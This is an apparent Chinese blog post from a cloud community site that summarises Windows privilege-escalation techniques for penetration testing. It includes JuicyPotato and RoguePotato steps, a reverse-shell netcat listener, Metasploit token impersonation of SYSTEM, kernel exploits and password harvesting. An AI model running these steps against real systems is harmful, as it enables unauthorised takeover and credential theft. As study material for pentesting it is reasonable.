内网渗透—Windows提权方法总结

举报
Mao-Qi 发表于 2023/11/23 17:32:48 2023/11/23
【摘要】 3a原则认证授权审计 组相关命令net localgroupnet localgroup administrators test *addnet localgroup testgroup /add potato 家族提权通过各种方法在本地(NILM-relay)中获取system令牌,再通过模拟令牌进行命令执行(拿到令牌的方式不同就会有不同的patato)。 windows的token:d...

3a原则

  • 认证

  • 授权

  • 审计

组相关命令

  • net localgroup
  • net localgroup administrators test *add
  • net localgroup testgroup /add

potato 家族提权

通过各种方法在本地(NILM-relay)中获取system令牌,再通过模拟令牌进行命令执行(拿到令牌的方式不同就会有不同的patato)。

windows的token:

  • delegation token(授权令牌):(用于于交互会话登录)(例如远程登录,本地登录)

  • impersonation token(模拟令牌):非交互会话登录(例如用net user访问用户文件)

  • sip和sap特权(本地管理员,SCM(服务控制管理器)启动的服务,COM对象(接口,通信协议,可以提供服务))

windows服务使用的登录账号

  • NT AUTHORITY\System

  • NT AUTHORITY\Network Service

  • NT AUTHORITY\Local Server  常见用户(iis,sqlserver)

JuicyPotato

  • 通过NTML欺骗获取token

  • 通过(CLSID)枚举可用的com对象 利用可用的身份去调用一个api函数,传入获取到的token去模拟令牌执行对应的高权限命令或者反弹shell

### 操作流程

  • 先上去 whoami /priv 看看是否有特权

  • 攻击机端口监听

  • JuicyPotato.exe -t $ -p C: \Users\user \Desktop\Rev.bat -l 1337 -c{83ca98d6-ff5d-49b8-abc6-83dd84127820}

RoguePotato

高版本的windows不允许在本地NTLM请求,

  • 外部请求vps

  • 将获取到的token再转发回去

操作流程

  • 获取反弹shell (nc -lvvp 3333)(chcp 65001)

  • *对应文件(尽可能跳到低权限文件夹)

  • vps监听端口转发

  • 执行命令

##  AlwaysInstallElevated 系统配置错误提权

令牌窃取(也可以用来降权)

1.msf use incognito

2.list_tokens -u

3.impersonate_token"NTAUTHORITY\SYSTEM"

内核提权(永恒之蓝ms170-010)(ms15-051)

msf一顿扫

密码收集

1.直接看浏览器保存的密码

mysql udf提权

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。